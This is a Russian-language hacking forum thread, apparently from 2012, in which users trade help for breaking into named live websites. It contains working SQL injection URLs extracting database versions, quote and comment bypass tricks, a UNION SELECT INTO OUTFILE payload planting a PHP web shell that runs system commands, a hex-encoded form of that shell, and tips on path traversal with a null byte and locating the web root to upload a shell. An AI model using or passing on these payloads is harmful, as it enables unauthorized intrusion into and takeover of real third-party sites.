Ваши вопросы по уязвимостям.

Discussion in 'Уязвимости' started by darky, 4 Aug 2007.

Thread Status:
Not open for further replies.
  1. Tigger

    Tigger Elder - Старейшина

    Joined:
    27 Aug 2007
    Messages:
    1,076
    Likes Received:
    527
    Reputations:
    204
    Зачем использование переменных?
    Вот все выводит:
    http://baratro.ru//subcat.php?id=22'or(1)+group+by+concat(version(),floor(rand(0)*2))having(min(0))or(1)and'


    Твой запрос не работает из-за комментария:

    http://baratro.ru/subcat.php?id=22'and(select+1+from(select+count(*),concat((select+concat(version(),0x3a)+from+information_schema.tables+limit+0,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)and'

    Вместо and', тот, что на конце можно использовать 100500 вариантов:
    -- a
    and'
    and'1'='1
    %23
    И т.д...
     
    1 person likes this.
  2. Byrger

    Byrger Elder - Старейшина

    Joined:
    7 Mar 2008
    Messages:
    554
    Likes Received:
    26
    Reputations:
    -4
    Привет

    Подскажите как раскрутить скулю если я не могу оборвать запрос стандартными --+
    + так и выводится в ошибке как плюс
    Пробовал /**/ - режется
    %09...%20 и т.д. так-же выводятся в ошибке как есть

    PHP:
    SELECT FROM users WHERE link 'admin'--+'
    You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''' 
    at line 1
     
  3. Ereee

    Ereee Reservists Of Antichat

    Joined:
    1 Dec 2011
    Messages:
    602
    Likes Received:
    373
    Reputations:
    267
    Попробуй:
    PHP:
    SELECT FROM users WHERE link 'admin' and '1'='1
     
  4. Byrger

    Byrger Elder - Старейшина

    Joined:
    7 Mar 2008
    Messages:
    554
    Likes Received:
    26
    Reputations:
    -4
    Не прокатывает.

    PHP:
    SELECT FROM users WHERE link 'admin'+and+1='1'
    You have an error in your SQL syntaxcheck the manual that corresponds to your MySQL server version for the right syntax to use near 'and+1='1'' at line 1
     
  5. Faaax

    Faaax Banned

    Joined:
    30 Aug 2010
    Messages:
    428
    Likes Received:
    48
    Reputations:
    11
    PHP:
    SELECT FROM users WHERE link 'admin' and '1'=(кавычка)1
    попробуй так ещё
     
    1 person likes this.
  6. Ereee

    Ereee Reservists Of Antichat

    Joined:
    1 Dec 2011
    Messages:
    602
    Likes Received:
    373
    Reputations:
    267
    Byrger, не поверишь!
    Я писал пост так:
    Но вывелось:
    PHP:
    SELECT FROM users WHERE link 'admin' and '1'='1
    Кавычка пропала, баг форума... Юзай:
    Code:
    SELECT * FROM users WHERE link = 'admin' and '1'='1
     
  7. anonym_di

    anonym_di Member

    Joined:
    21 Jan 2012
    Messages:
    58
    Likes Received:
    7
    Reputations:
    0
    Народ буду благодарен тому кто мне подскажет как можно обойти вот это
    Code:
    http://www.mk.gov.kz/?lang=kaz&id_open_rubric=469
     
  8. Byrger

    Byrger Elder - Старейшина

    Joined:
    7 Mar 2008
    Messages:
    554
    Likes Received:
    26
    Reputations:
    -4
    Прочитай мой пост, я так и попробовал...
    и '1'='1
    и 1='1
     
  9. Ereee

    Ereee Reservists Of Antichat

    Joined:
    1 Dec 2011
    Messages:
    602
    Likes Received:
    373
    Reputations:
    267
    Ссылку в студио!
     
  10. Koren

    Koren Member

    Joined:
    11 Jul 2009
    Messages:
    102
    Likes Received:
    20
    Reputations:
    1
    где можно скачать исходники этого движка? или купить.
    кстате что за двиг rangehoodsupply.com
     
  11. Gaben7

    Gaben7 Member

    Joined:
    8 Jan 2012
    Messages:
    129
    Likes Received:
    9
    Reputations:
    6
    www.xxxxx.com/watch/922/ashot/

    Blind SQL Injection

    Attack details
    Cookie input RNLBSERVERID was set to -1" or "49"="49
    подскажите с чего начать
     
    #19971 Gaben7, 28 Mar 2012
    Last edited: 28 Mar 2012
  12. nikaw87

    nikaw87 New Member

    Joined:
    14 Jul 2011
    Messages:
    6
    Likes Received:
    1
    Reputations:
    0
    Вопрос такой... Имеется файл который отвечает за вывод картинки, /resize.php?act=gif&image=../../ххх/хх/34.png , из него что то дельное можно выжать? или бесполезно? таким образом только картинки вытягивает...
     
  13. OxoTnik

    OxoTnik На мышей

    Joined:
    10 Jun 2011
    Messages:
    1,092
    Likes Received:
    526
    Reputations:
    173
    Заливаешь картинку с шелом, и таким же образом вытягиваешь, если чё нул байт
     
  14. Ereee

    Ereee Reservists Of Antichat

    Joined:
    1 Dec 2011
    Messages:
    602
    Likes Received:
    373
    Reputations:
    267
    Название скрипта подозрительное. Думаю кроме раскрытия путей ничего не получишь.
    OxoTnik,
    я не думаю, что картинки инклудят.
     
  15. nikaw87

    nikaw87 New Member

    Joined:
    14 Jul 2011
    Messages:
    6
    Likes Received:
    1
    Reputations:
    0
    Заливал... также тянул-просто черное изображение( жаль...
     
  16. nikaw87

    nikaw87 New Member

    Joined:
    14 Jul 2011
    Messages:
    6
    Likes Received:
    1
    Reputations:
    0
    Говорю же- только картинки... пробовал достать банально robots.txt, ноль эффекта... решил спросить, может обходные пути есть
     
  17. Facecontrol

    Facecontrol New Member

    Joined:
    12 Mar 2012
    Messages:
    45
    Likes Received:
    0
    Reputations:
    0
    Помогите залить шелл,пробовал так,не получаутся
    http://www.hsplusdesign.be/itemviewer.php?id=-39+UNION+SELECT+1,2,3,'<? system($_GET[cmd]); ?>',5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21+from+mysql.user+into+outfile+'/var/www/html/PHPscripts/a.html'--
     
  18. Cennarios

    Cennarios Elder - Старейшина

    Joined:
    13 Jul 2008
    Messages:
    425
    Likes Received:
    179
    Reputations:
    108

    А так и не получится. Ибо или magic_quotes On либо слеширование вида use near '\'test\',5,6,7. Как минимум ищите скрипты где не происходит слеширование (используются не GPC массивы и тп) и поиск phpmyadmin


    PS. Прежде чем делать что-либо , потрудитесь изучить теорию хотябы в минимуме. Изза слеширования вставляются доп символы в sql запрос и он становится некорректным
     
    #19978 Cennarios, 28 Mar 2012
    Last edited: 28 Mar 2012
  19. Faaax

    Faaax Banned

    Joined:
    30 Aug 2010
    Messages:
    428
    Likes Received:
    48
    Reputations:
    11
    попробуй перевести в HEX <? system($_GET[cmd]); ?>
    получится так
    Code:
    0x3c3f2073797374656d28245f4745545b636d645d293b203f3e
    хотя не получится
     
    #19979 Faaax, 28 Mar 2012
    Last edited: 28 Mar 2012
  20. GaMeSTeR

    GaMeSTeR Banned

    Joined:
    3 Dec 2011
    Messages:
    10
    Likes Received:
    1
    Reputations:
    0
    Помогите залить шелл, есть все права, но не могу найти путь до корня сайта, пробовал найти в конфигах /etc/apache2/sites-available/(здесь не могу подобрать имя конфига)
    В ошибке естественно путь тоже не проскакивает. Уже 3 часа угробил на этот сайт. Где ещё можно поискать?
     
Loading...
Thread Status:
Not open for further replies.